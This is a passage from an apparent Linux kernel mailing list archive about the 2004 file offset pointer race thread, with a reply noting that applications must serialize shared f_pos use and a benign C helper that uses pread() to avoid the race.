logics in their code serializing those are also getting what they'd asked
for - GIGO. It should not break the kernel, obviously, but kernel has no
business being nice to inherently racy userland code. BTW, you do realize
that lseek() in the middle of read() on the same descriptor will be lost?
On regular files, on quite a few Unices, Linux included."
We don't guarantee serialization of a file descriptor's f_pos
(I mistyped "file description" in the last email).
That's up to the user application.
Makes sense to me.
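Serializing use of a shared f_pos is left to the application. One way to sidestep the problem entirely is to have each thread use pread(2) with its own explicit offset, because pread() neither uses nor updates the descriptor's file offset. The sketch below assumes a POSIX system. read_fully_at() is a hypothetical helper. When a shared offset is really wanted, a mutex around lseek()+read() would be the alternative.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Read up to len bytes starting at off without using or moving the
 * descriptor's shared file offset; retries short reads and EINTR.
 * Returns the number of bytes read (short only at EOF) or -1 on error. */
static ssize_t read_fully_at(int fd, void *buf, size_t len, off_t off)
{
    size_t done = 0;

    while (done < len) {
        ssize_t n = pread(fd, (char *)buf + done, len - done,
                          off + (off_t)done);
        if (n < 0) {
            if (errno == EINTR)
                continue;                /* interrupted: retry */
            return -1;
        }
        if (n == 0)
            break;                       /* end of file */
        done += (size_t)n;
    }
    return (ssize_t)done;
}
```

Each caller keeps its offset in a local variable, so two threads sharing the descriptor never race on f_pos.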
Thread overview: 13+ messages
2004-08-05 8:42 FW: Linux kernel file offset pointer races Giuliano Pochini
2004-08-05 10:30 ` Jirka Kosina
2004-08-07 17:15 ` Marcelo Tosatti
2004-08-11 14:26 ` Andrey Savochkin
2004-08-11 21:14 ` Marcelo Tosatti
2004-08-12 7:55 ` Andrey Savochkin
2004-08-12 13:53 ` Marcelo Tosatti
2004-08-09 8:33 ` Frank Steiner
2004-08-09 14:45 ` Alan Cox
2004-08-09 16:50 ` Jonathan Corbet
2004-08-09 17:24 ` Linus Torvalds
2004-08-10 6:08 ` Frank Steiner
2004-08-05 20:34 ` Alan Cox